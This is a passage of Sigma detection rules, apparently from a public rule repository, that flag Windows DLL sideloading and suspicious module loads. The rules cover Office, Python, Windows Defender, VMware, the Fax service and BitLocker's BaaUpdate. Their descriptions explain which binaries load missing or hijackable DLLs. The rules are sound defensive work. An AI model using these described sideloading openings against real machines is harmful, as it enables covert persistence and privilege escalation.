    "content": "title: Microsoft Office DLL Sideload\nid: 829a3bdf-34da-4051-9cf4-8ed221a8ae4f\nstatus: test\ndescription: Detects DLL sideloading of DLLs that are part of Microsoft Office from a non-standard location\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-08-17\nmodified: 2023-03-15\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\outllib.dll'\n    filter:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\Microsoft Office\\OFFICE'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\OFFICE'\n            - 'C:\\Program Files\\Microsoft Office\\Root\\OFFICE'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_python.yml",
    "content": "title: Potential Python DLL SideLoading\nid: d36f7c12-14a3-4d48-b6b8-774b9c66f44d\nstatus: test\ndescription: Detects potential DLL sideloading of Python DLL files.\nreferences:\n    - https://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/\n    - https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\n    - https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-10-06\nmodified: 2025-08-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\python39.dll'\n            - '\\python310.dll'\n            - '\\python311.dll'\n            - '\\python312.dll'\n    filter_main_default_install_paths:\n        - ImageLoaded|startswith:\n              - 'C:\\Program Files\\Python3'\n              - 'C:\\Program Files (x86)\\Python3'\n        - ImageLoaded|contains: '\\AppData\\Local\\Programs\\Python\\Python3'\n    filter_optional_visual_studio:\n        ImageLoaded|startswith: 'C:\\Program Files\\Microsoft Visual Studio\\'\n    filter_optional_anaconda:\n        ImageLoaded|startswith: 'C:\\ProgramData\\Anaconda3\\' # Comment out if you don't use Anaconda in your environment\n    filter_optional_cpython:\n        ImageLoaded|contains:\n            - '\\cpython\\externals\\'\n            - '\\cpython\\PCbuild\\'\n    filter_optional_pyinstaller:\n        # Triggered by programs bundled with PyInstaller\n        ImageLoaded|startswith: 'C:\\Users'\n        ImageLoaded|contains: '\\AppData\\Local\\Temp\\_MEI'\n    filter_main_legit_signature_details:\n        Product: 'Python'\n        Signed: 'true'\n        Description: 'Python'\n        Company: 'Python Software Foundation'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software using Python DLLs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_rcdll.yml",
    "content": "title: Potential Rcdll.DLL Sideloading\nid: 6e78b74f-c762-4800-82ad-f66787f10c8a\nstatus: test\ndescription: Detects potential DLL sideloading of rcdll.dll\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html\nauthor: X__Junior (Nextron Systems)\ndate: 2023-03-13\nmodified: 2023-03-15\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\rcdll.dll'\n    filter:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files (x86)\\Windows Kits\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_rjvplatform_default_location.yml",
    "content": "title: Potential RjvPlatform.DLL Sideloading From Default Location\nid: 259dda31-b7a3-444f-b7d8-17f96e8a7d0d\nstatus: test\ndescription: Detects loading of \"RjvPlatform.dll\" by the \"SystemResetPlatform.exe\" binary which can be abused as a method of DLL side loading since the \"$SysReset\" directory isn't created by default.\nreferences:\n    - https://twitter.com/0gtweet/status/1666716511988330499\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image: 'C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe'\n        ImageLoaded: 'C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_rjvplatform_non_default_location.yml",
    "content": "title: Potential RjvPlatform.DLL Sideloading From Non-Default Location\nid: 0e0bc253-07ed-43f1-816d-e1b220fe8971\nstatus: test\ndescription: Detects potential DLL sideloading of \"RjvPlatform.dll\" by \"SystemResetPlatform.exe\" located in a non-default location.\nreferences:\n    - https://twitter.com/0gtweet/status/1666716511988330499\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\RjvPlatform.dll'\n        Image: '\\SystemResetPlatform.exe'\n    filter_main_legit_path:\n        Image|startswith: 'C:\\Windows\\System32\\SystemResetPlatform\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_robform.yml",
    "content": "title: Potential RoboForm.DLL Sideloading\nid: f64c9b2d-b0ad-481d-9d03-7fc75020892a\nstatus: test\ndescription: Detects potential DLL sideloading of \"roboform.dll\", a DLL used by RoboForm Password Manager\nreferences:\n    - https://twitter.com/StopMalvertisin/status/1648604148848549888\n    - https://twitter.com/t3ft3lb/status/1656194831830401024\n    - https://www.roboform.com/\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-14\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\roboform.dll'\n            - '\\roboform-x64.dll'\n    filter_main_path:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\'\n            - 'C:\\Program Files\\Siber Systems\\AI RoboForm\\'\n        Image|endswith:\n            - '\\robotaskbaricon.exe'\n            - '\\robotaskbaricon-x64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - If installed on a per-user level, the path would be located in \"AppData\\Local\". Add additional filters to reflect this mode of installation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_shell_chrome_api.yml",
    "content": "title: DLL Sideloading Of ShellChromeAPI.DLL\nid: ee4c5d06-3abc-48cc-8885-77f1c20f4451\nrelated:\n    - id: e173ad47-4388-4012-ae62-bd13f71c18a8\n      type: similar\nstatus: test\ndescription: |\n    Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary, which tries to load this DLL when started with the \"PhoneDeepLink\" flag.\n    Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter.\nreferences:\n    - https://mobile.twitter.com/0gtweet/status/1564131230941122561\n    - https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-01\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        # The DLL shouldn't exist on Windows anymore. If for some reason you still have it, you could filter out legitimate calls\n        ImageLoaded|endswith: '\\ShellChromeAPI.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_shelldispatch.yml",
    "content": "title: Potential ShellDispatch.DLL Sideloading\nid: 844f8eb2-610b-42c8-89a4-47596e089663\nstatus: test\ndescription: Detects potential DLL sideloading of \"ShellDispatch.dll\"\nreferences:\n    - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-20\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\ShellDispatch.dll'\n    filter_main_legit_path:\n        - ImageLoaded|contains|all:\n              - ':\\Users\\'\n              - '\\AppData\\Local\\Temp\\'\n        - ImageLoaded|contains: ':\\Windows\\Temp\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some installers may trigger some false positives\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_smadhook.yml",
    "content": "title: Potential SmadHook.DLL Sideloading\nid: 24b6cf51-6122-469e-861a-22974e9c1e5b\nstatus: test\ndescription: Detects potential DLL sideloading of \"SmadHook.dll\", a DLL used by SmadAV antivirus\nreferences:\n    - https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\n    - https://www.qurium.org/alerts/targeted-malware-against-crph/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-01\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\SmadHook32c.dll'\n            - '\\SmadHook64c.dll'\n    filter_main_legit_path:\n        Image:\n            - 'C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe'\n            - 'C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe'\n            - 'C:\\Program Files\\SMADAV\\SmadavProtect32.exe'\n            - 'C:\\Program Files\\SMADAV\\SmadavProtect64.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\SMADAV\\'\n            - 'C:\\Program Files\\SMADAV\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_solidpdfcreator.yml",
    "content": "title: Potential SolidPDFCreator.DLL Sideloading\nid: a2edbce1-95c8-4291-8676-0d45146862b3\nstatus: test\ndescription: Detects potential DLL sideloading of \"SolidPDFCreator.dll\"\nreferences:\n    - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-05-07\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\SolidPDFCreator.dll'\n    filter_main_path:\n        Image|endswith: '\\SolidPDFCreator.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\'\n            - 'C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_third_party.yml",
    "content": "title: Third Party Software DLL Sideloading\nid: f9df325d-d7bc-4a32-8a1a-2cc61dcefc63\nstatus: test\ndescription: Detects DLL sideloading of DLLs that are part of third party software (Zoom, Discord, etc.)\nreferences:\n    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)\nauthor: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)\ndate: 2022-08-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    # Lenovo\n    selection_lenovo:\n        ImageLoaded|endswith: '\\commfunc.dll'\n    filter_lenovo:\n        - ImageLoaded|contains: '\\AppData\\local\\Google\\Chrome\\Application\\'\n        - ImageLoaded|startswith:\n              - 'C:\\Program Files\\Lenovo\\Communications Utility\\'\n              - 'C:\\Program Files (x86)\\Lenovo\\Communications Utility\\'\n    # Toshiba\n    selection_toshiba:\n        ImageLoaded|endswith: '\\tosbtkbd.dll'\n    filter_toshiba:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\'\n            - 'C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\'\n    # Zoom (FP with System32)\n    # selection_zoom:\n    #     ImageLoaded|endswith: '\\version.dll'\n    # filter_zoom:\n    #     ImageLoaded|startswith: 'C:\\Users\\'\n    #     ImageLoaded|contains: '\\AppData\\Roaming\\Zoom\\bin\\'\n    condition: (selection_lenovo and not filter_lenovo) or (selection_toshiba and not filter_toshiba)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_ualapi.yml",
    "content": "title: Fax Service DLL Search Order Hijack\nid: 828af599-4c53-4ed2-ba4a-a9f835c434ea\nstatus: test\ndescription: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.\nreferences:\n    - https://windows-internals.com/faxing-your-way-to-system/\nauthor: NVISO\ndate: 2020-05-04\nmodified: 2022-06-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\fxssvc.exe'\n        ImageLoaded|endswith: 'ualapi.dll'\n    filter:\n        ImageLoaded|startswith: 'C:\\Windows\\WinSxS\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_vivaldi_elf.yml",
    "content": "title: Potential Vivaldi_elf.DLL Sideloading\nid: 2092cacb-d77b-4f98-ab0d-32b32f99a054\nstatus: test\ndescription: Detects potential DLL sideloading of \"vivaldi_elf.dll\"\nreferences:\n    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-08-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\vivaldi_elf.dll'\n    filter_main_legit_path:\n        Image|endswith: '\\Vivaldi\\Application\\vivaldi.exe'\n        ImageLoaded|contains: '\\Vivaldi\\Application\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_vmguestlib.yml",
    "content": "title: VMGuestLib DLL Sideload\nid: 70e8e9b4-6a93-4cb7-8cde-da69502e7aff\nstatus: test\ndescription: Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.\nreferences:\n    - https://decoded.avast.io/martinchlumecky/png-steganography/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-01\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains|all:\n            - '\\VMware\\VMware Tools\\vmStatsProvider\\win32'\n            - '\\vmGuestLib.dll'\n        Image|endswith: '\\Windows\\System32\\wbem\\WmiApSrv.exe'\n    filter:\n        Signed: 'true'\n    condition: selection and not filter\nfalsepositives:\n    - FP could occur if the legitimate version of vmGuestLib already exists on the system\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_vmmap_dbghelp_signed.yml",
    "content": "title: VMMap Signed Dbghelp.DLL Potential Sideloading\nid: 98ffaed4-aec2-4e04-9b07-31492fe68b3d\nrelated:\n    - id: 273a8dd8-3742-4302-bcc7-7df5a80fe425\n      type: similar\nstatus: test\ndescription: Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.\nreferences:\n    - https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-05\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains: 'C:\\Debuggers\\dbghelp.dll'\n        Image|endswith:\n            - '\\vmmap.exe'\n            - '\\vmmap64.exe'\n        Signed: 'true'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml",
    "content": "title: VMMap Unsigned Dbghelp.DLL Potential Sideloading\nid: 273a8dd8-3742-4302-bcc7-7df5a80fe425\nrelated:\n    - id: 98ffaed4-aec2-4e04-9b07-31492fe68b3d\n      type: similar\nstatus: test\ndescription: Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.\nreferences:\n    - https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-28\nmodified: 2023-09-05\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains: 'C:\\Debuggers\\dbghelp.dll'\n        Image|endswith:\n            - '\\vmmap.exe'\n            - '\\vmmap64.exe'\n    filter_main_signed:\n        Signed: 'true'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_vmware_xfer.yml",
    "content": "title: Potential DLL Sideloading Via VMware Xfer\nid: 9313dc13-d04c-46d8-af4a-a930cc55d93b\nstatus: test\ndescription: Detects loading of a DLL by the VMware Xfer utility from a non-default directory, which may be an attempt to sideload an arbitrary DLL\nreferences:\n    - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-02\nmodified: 2023-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\VMwareXferlogs.exe'\n        ImageLoaded|endswith: '\\glib-2.0.dll'\n    filter: # VMware might be installed in another path so update the rule accordingly\n        ImageLoaded|startswith: 'C:\\Program Files\\VMware\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_waveedit.yml",
    "content": "title: Potential Waveedit.DLL Sideloading\nid: 71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb\nstatus: test\ndescription: Detects potential DLL sideloading of \"waveedit.dll\", which is part of the Nero WaveEditor audio editing software.\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-14\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\waveedit.dll'\n    filter_main_legit_path:\n        Image:\n            - 'C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe'\n            - 'C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\'\n            - 'C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_wazuh.yml",
    "content": "title: Potential Wazuh Security Platform DLL Sideloading\nid: db77ce78-7e28-4188-9337-cf30e2b3ba9f\nstatus: test\ndescription: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html\nauthor: X__Junior (Nextron Systems)\ndate: 2023-03-13\nmodified: 2023-05-12\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\libwazuhshared.dll'\n            - '\\libwinpthread-1.dll'\n    filter_main_generic:\n        ImageLoaded|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_optional_mingw64:\n        # Note: Many third party apps installed in \"AppData\" or \"ProgramData\" that leverage \"mingw64\" make use of \"libwinpthread-1.dll\"\n        # In production it's best to make a list of these apps and replace this filter with a specific one.\n        ImageLoaded|contains:\n            - '\\AppData\\Local\\'\n            - '\\ProgramData\\'\n        ImageLoaded|endswith: '\\mingw64\\bin\\libwinpthread-1.dll'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_windows_defender.yml",
    "content": "title: Potential Mpclient.DLL Sideloading\nid: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc\nrelated:\n    - id: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9\n      type: similar\nstatus: test\ndescription: Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.\nreferences:\n    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool\nauthor: Bhabesh Raj\ndate: 2022-08-02\nmodified: 2023-08-04\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\mpclient.dll'\n        Image|endswith:\n            - '\\MpCmdRun.exe'\n            - '\\NisSrv.exe'\n    filter_main_known_locations:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Windows Defender\\'\n            - 'C:\\Program Files\\Microsoft Security Client\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_side_load_wwlib.yml",
    "content": "title: Potential WWlib.DLL Sideloading\nid: e2e01011-5910-4267-9c3b-4149ed5479cf\nstatus: test\ndescription: Detects potential DLL sideloading of \"wwlib.dll\"\nreferences:\n    - https://twitter.com/WhichbufferArda/status/1658829954182774784\n    - https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/\n    - https://securelist.com/apt-luminousmoth/103332/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-05-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\wwlib.dll'\n    filter_main_path:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Office\\'\n            - 'C:\\Program Files\\Microsoft Office\\'\n        Image|endswith: '\\winword.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Office\\'\n            - 'C:\\Program Files\\Microsoft Office\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_baaupdate_dll_load.yml",
    "content": "title: BaaUpdate.exe Suspicious DLL Load\nid: 6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984\nrelated:\n    - id: 9f38c1db-e2ae-40bf-81d0-5b68f73fb512 # Suspicious BitLocker Access Agent Update Utility Execution\n      type: similar\nstatus: experimental\ndescription: |\n    Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable, which could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.\n    This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)\n    which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.\nreferences:\n    - https://github.com/rtecCyberSec/BitlockMove\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-18\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\BaaUpdate.exe'\n        ImageLoaded|endswith: '.dll'\n        ImageLoaded|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Contacts\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\Links\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\ProgramData\\'\n            - '\\Temporary Internet'\n            - '\\Videos\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml",
    "content": "title: Unsigned Module Loaded by ClickOnce Application\nid: 060d5ad4-3153-47bb-8382-43e5e29eda92\nstatus: test\ndescription: Detects unsigned module load by ClickOnce application.\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nauthor: '@SerkinValery'\ndate: 2023-06-08\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_path:\n        Image|contains: '\\AppData\\Local\\Apps\\2.0\\'\n    selection_sig_status:\n        - Signed: 'false'\n        - SignatureStatus: 'Expired'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_dll_load_system_process.yml",
    "content": "title: DLL Load By System Process From Suspicious Locations\nid: 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c\nstatus: test\ndescription: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as \"C:\\Users\\Public\"\nreferences:\n    - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-17\nmodified: 2023-09-18\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|startswith: 'C:\\Windows\\'\n        ImageLoaded|startswith:\n            # TODO: Add more suspicious paths as you see fit in your env\n            - 'C:\\Users\\Public\\'\n            - 'C:\\PerfLogs\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_python_image_load.yml",
    "content": "title: Python Image Load By Non-Python Process\nid: cbb56d62-4060-40f7-9466-d8aaf3123f83\nstatus: test\ndescription: |\n    Detects the image load of \"Python Core\" by a non-Python process. This might indicate the execution of an executable that has been bundled from Python code.\n    Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.\n    Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.\nreferences:\n    - https://www.py2exe.org/\n    - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/\nauthor: Patrick St. John, OTR (Open Threat Research)\ndate: 2020-05-03\nmodified: 2025-08-18\ntags:\n    - attack.defense-evasion\n    - attack.t1027.002\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Description: 'Python Core'\n    filter_main_generic:\n        - Image|contains: 'Python'  # FPs with python38.dll, python.exe etc.\n        - Image|startswith:\n              - 'C:\\Program Files\\'\n              - 'C:\\Program Files (x86)\\'\n              - 'C:\\ProgramData\\Anaconda3\\' # Comment out if you don't use Anaconda in your environment\n    filter_optional_null_image:\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - 